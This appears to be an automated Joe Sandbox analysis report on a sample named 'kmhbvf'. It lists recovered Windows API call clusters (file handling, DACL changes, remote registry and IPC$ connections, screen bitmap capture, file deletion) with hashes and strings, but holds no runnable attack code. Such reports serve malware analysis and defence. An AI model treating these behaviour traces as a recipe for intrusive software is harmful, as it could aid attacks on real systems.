                                                                  • Instruction Fuzzy Hash: DF31D47190010EABDB219FA1DC49FFB73BCEF89710F2041B6F648E21A0EB7096449B25
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F5982C,?,?), ref: 00F5C0C8
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0DF
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0EA
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0F7
                                                                  • GlobalLock.KERNEL32 ref: 00F5C100
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C10F
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C118
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C11F
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C130
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F63C7C,?), ref: 00F5C149
                                                                  • GlobalFree.KERNEL32 ref: 00F5C159
                                                                  • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C17D
                                                                  • CopyImage.USER32 ref: 00F5C1A8
                                                                  • DeleteObject.GDI32(00000000), ref: 00F5C1D0
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F5C1E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 84d73522fa013b50650e3d3fbd2d8449a0f40b1282e7c15e90a9c1b59b565156
                                                                  • Instruction ID: 5dd0306f99bf4800b16b31aa5cf9490ad5219c9395fe4ccd9805a07f54d6a90c
                                                                  • Opcode Fuzzy Hash: 84d73522fa013b50650e3d3fbd2d8449a0f40b1282e7c15e90a9c1b59b565156
                                                                  • Instruction Fuzzy Hash: D2414C75500208FFCB219F64DC48EAB7BB8EF89722F204058FD16D72A0DBB09945EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 00F3E053
                                                                  • _wcscat.LIBCMT ref: 00F3E06B
                                                                  • _wcscat.LIBCMT ref: 00F3E07D
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3E092
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E0A6
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00F3E0BE
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F3E0D8
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E0EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: d84327416345efbbadcd9303076337879cdcc1fbd4a6815c60638ccc55709f1a
                                                                  • Instruction ID: 1c8050f34035d92035f7321f393a3737130de66fd9d2a8e809b6552614f86a51
                                                                  • Opcode Fuzzy Hash: d84327416345efbbadcd9303076337879cdcc1fbd4a6815c60638ccc55709f1a
                                                                  • Instruction Fuzzy Hash: 1E8192B29042459FC724EF74D88496AB7E8FF98320F14882EF886D7251E730E945DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F5C8A4
                                                                  • GetFocus.USER32(?,?,?,?), ref: 00F5C8B4
                                                                  • GetDlgCtrlID.USER32 ref: 00F5C8BF
                                                                  • _memset.LIBCMT ref: 00F5C9EA
                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F5CA15
                                                                  • GetMenuItemCount.USER32 ref: 00F5CA35
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00F5CA48
                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F5CA7C
                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F5CAC4
                                                                  • CheckMenuRadioItem.USER32 ref: 00F5CAFC
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F5CB31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: fc496a6e6cd93beb9b41155bf08e7efbd690893db9c277dad3326ac78b65bfd8
                                                                  • Instruction ID: 53ee05597aaf32b08478a94d3c9097ab669007a26e876300f95c8c0bdff3caa6
                                                                  • Opcode Fuzzy Hash: fc496a6e6cd93beb9b41155bf08e7efbd690893db9c277dad3326ac78b65bfd8
                                                                  • Instruction Fuzzy Hash: 0B819F71608305AFD710DF14C885A6B7BE8FF88765F10451DFE96A3291C770D909EBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E3C
                                                                    • Part of subcall function 00F28E20: GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
                                                                    • Part of subcall function 00F28E20: GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
                                                                    • Part of subcall function 00F28E20: HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
                                                                    • Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E73
                                                                    • Part of subcall function 00F28EBD: GetProcessHeap.KERNEL32(00000008,00F28916,00000000,00000000,?,00F28916,?), ref: 00F28EC9
                                                                    • Part of subcall function 00F28EBD: HeapAlloc.KERNEL32(00000000,?,00F28916,?), ref: 00F28ED0
                                                                    • Part of subcall function 00F28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F28916,?), ref: 00F28EE1
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F28B2E
                                                                  • _memset.LIBCMT ref: 00F28B43
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F28B62
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00F28B73
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00F28BB0
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F28BCC
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00F28BE9
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F28BF8
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00F28BFF
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F28C20
                                                                  • CopySid.ADVAPI32(00000000), ref: 00F28C27
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F28C58
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F28C7E
                                                                  • SetUserObjectSecurity.USER32 ref: 00F28C92
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 075527f5b44e3268102cb0c38fbd42e87e507d916451c610849f3e93bb3e22ac
                                                                  • Instruction ID: e5c0e3632e2dc02466e336e5c6696e7b6defa53e0d04585d94446d4d2503f01b
                                                                  • Opcode Fuzzy Hash: 075527f5b44e3268102cb0c38fbd42e87e507d916451c610849f3e93bb3e22ac
                                                                  • Instruction Fuzzy Hash: B36168B1901219BFCF109FA0ED44EEEBB79FF04350F148169F925A6290DB759A06EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 00F47A79
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F47A85
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00F47A91
                                                                  • SelectObject.GDI32(00000000,?), ref: 00F47A9E
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F47AF2
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F47B2E
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F47B52
                                                                  • SelectObject.GDI32(00000006,?), ref: 00F47B5A
                                                                  • DeleteObject.GDI32(?), ref: 00F47B63
                                                                  • DeleteDC.GDI32(00000006), ref: 00F47B6A
                                                                  • ReleaseDC.USER32 ref: 00F47B75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: 1268f18529acc9d8370e255eb815530a13e906506d6f2c2f88d093d5e705b7c7
                                                                  • Instruction ID: 56b78aa1410a8be7e44c1006f5c5024aafd8272557299a54d024fea331b16116
                                                                  • Opcode Fuzzy Hash: 1268f18529acc9d8370e255eb815530a13e906506d6f2c2f88d093d5e705b7c7
                                                                  • Instruction Fuzzy Hash: A6514872904309EFCB15DFA8CC85EAFBBB9EF48310F14841DF95AA7220D775A9419B60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F3A4D4
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F3A4F6
                                                                  • __swprintf.LIBCMT ref: 00F3A54F
                                                                  • __swprintf.LIBCMT ref: 00F3A568
                                                                  • _wprintf.LIBCMT ref: 00F3A61E
                                                                  • _wprintf.LIBCMT ref: 00F3A63C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 311963372-2391861430
                                                                  • Opcode ID: 7659629ddf63d5ea9e28c841d80b9758068e9bc786fbc4cd1a367ece9b6067b6
                                                                  • Instruction ID: fc11da54248bea7b54f1834ecd0450403a03d2793ad2936e9693b494f5eb0712
                                                                  • Opcode Fuzzy Hash: 7659629ddf63d5ea9e28c841d80b9758068e9bc786fbc4cd1a367ece9b6067b6
                                                                  • Instruction Fuzzy Hash: 6A51927190024DABCF14EBE1CD46EEEB7B9AF14350F200166F505B20A2EB356F98EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F3951A: __time64.LIBCMT ref: 00F39524
                                                                    • Part of subcall function 00EE4A8C: _fseek.LIBCMT ref: 00EE4AA4
                                                                  • __wsplitpath.LIBCMT ref: 00F397EF
                                                                    • Part of subcall function 00EF431E: __wsplitpath_helper.LIBCMT ref: 00EF435E
                                                                  • _wcscpy.LIBCMT ref: 00F39802
                                                                  • _wcscat.LIBCMT ref: 00F39815
                                                                  • __wsplitpath.LIBCMT ref: 00F3983A
                                                                  • _wcscat.LIBCMT ref: 00F39850
                                                                  • _wcscat.LIBCMT ref: 00F39863
                                                                    • Part of subcall function 00F39560: _memmove.LIBCMT ref: 00F39599
                                                                    • Part of subcall function 00F39560: _memmove.LIBCMT ref: 00F395A8
                                                                  • _wcscmp.LIBCMT ref: 00F397AA
                                                                    • Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DE1
                                                                    • Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DF4
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F39A0D
                                                                  • _wcsncpy.LIBCMT ref: 00F39A80
                                                                  • DeleteFileW.KERNEL32(?,?), ref: 00F39AB6
                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F39ACC
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39ADD
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39AEF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 1500180987-0
                                                                  • Opcode ID: ff79ab616207e9b9aa77602e699fdd0b179df2a85e9cdd05acad5fc6bdf628db
                                                                  • Instruction ID: c19563932e206daa9a84e8c2d5010deab5bd1a2773abffb4389670d086f6832a
                                                                  • Opcode Fuzzy Hash: ff79ab616207e9b9aa77602e699fdd0b179df2a85e9cdd05acad5fc6bdf628db
                                                                  • Instruction Fuzzy Hash: 43C14DB2D0021DAADF11DF95CC85ADEB7BDEF44320F0040AAF609E7151EBB49A849F65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00EE5BF1
                                                                  • GetMenuItemCount.USER32 ref: 00F20E7B
                                                                  • GetMenuItemCount.USER32 ref: 00F20F2B
                                                                  • GetCursorPos.USER32(?), ref: 00F20F6F
                                                                  • SetForegroundWindow.USER32(00000000), ref: 00F20F78
                                                                  • TrackPopupMenuEx.USER32(00F97890,00000000,?,00000000,00000000,00000000), ref: 00F20F8B
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F20F97
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 2751501086-0
                                                                  • Opcode ID: 4697aa0f9d159efdfa0e096c60606ead1a3db879894f553d827ec256660f2465
                                                                  • Instruction ID: 060cf1c38d16116151a34a9d2e3427f2acec3d31099b3cb8b528f333210d4c33
                                                                  • Opcode Fuzzy Hash: 4697aa0f9d159efdfa0e096c60606ead1a3db879894f553d827ec256660f2465
                                                                  • Instruction Fuzzy Hash: DF710532A45719BFEB208B55DC45FAAFF64FF04728F240216F524661D2CBB16C50EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • _memset.LIBCMT ref: 00F28489
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F284BE
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F284DA
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F284F6
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F28520
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F28548
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F28553
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F28558
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1411258926-22481851
                                                                  • Opcode ID: 544a44c313cabdb74b5e6e48ea48919625a206933d7cec69ffdc375055762dc5
                                                                  • Instruction ID: d84b6d12687af9ec525249a3725d435400ccc51b3a2fb77cf44da55dfb7ce6b8
                                                                  • Opcode Fuzzy Hash: 544a44c313cabdb74b5e6e48ea48919625a206933d7cec69ffdc375055762dc5
                                                                  • Instruction Fuzzy Hash: D1414572C1022DABCF11EBA4DC95DEEB7B8FF08350F14416AE911B2261EA319E45DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-909552448
                                                                  • Opcode ID: a24af2471a170fe459f322b10300363d799261d79ff19b82e4942b02ac0dd59b
                                                                  • Instruction ID: 81c23231db422cbb85f2aa59584feb006337ca7ce143e2618db6ea33df25c7f7
                                                                  • Opcode Fuzzy Hash: a24af2471a170fe459f322b10300363d799261d79ff19b82e4942b02ac0dd59b
                                                                  • Instruction Fuzzy Hash: 5E41793190025E8BDF10EF90D940BEA33A4BF51351F641454FE92AB293EB31ED19EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                    • Part of subcall function 00EE153B: _memmove.LIBCMT ref: 00EE15C4
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F358EB
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F35901
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F35912
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F35924
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F35935
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_memmove
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 2279737902-1007645807
                                                                  • Opcode ID: 4bce2af5ff88b626853f6656e68e94d08513e24a730f0a104e51e24c995b752f
                                                                  • Instruction ID: 78904368dc744e868fc9fdfd6fde1875a50592ead2d9e0564aff0ff11b63cfcf
                                                                  • Opcode Fuzzy Hash: 4bce2af5ff88b626853f6656e68e94d08513e24a730f0a104e51e24c995b752f
                                                                  • Instruction Fuzzy Hash: 3E11B231A4026DB9D720B7A2CC4AEFF7BBCFBD1F60F400469B411A20D1EE705948DAA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 208665112-3771769585
                                                                  • Opcode ID: 9324152cd2317ed46db356337a73c45add29c5d6d6fb7cb04e4acd4f5bb25856
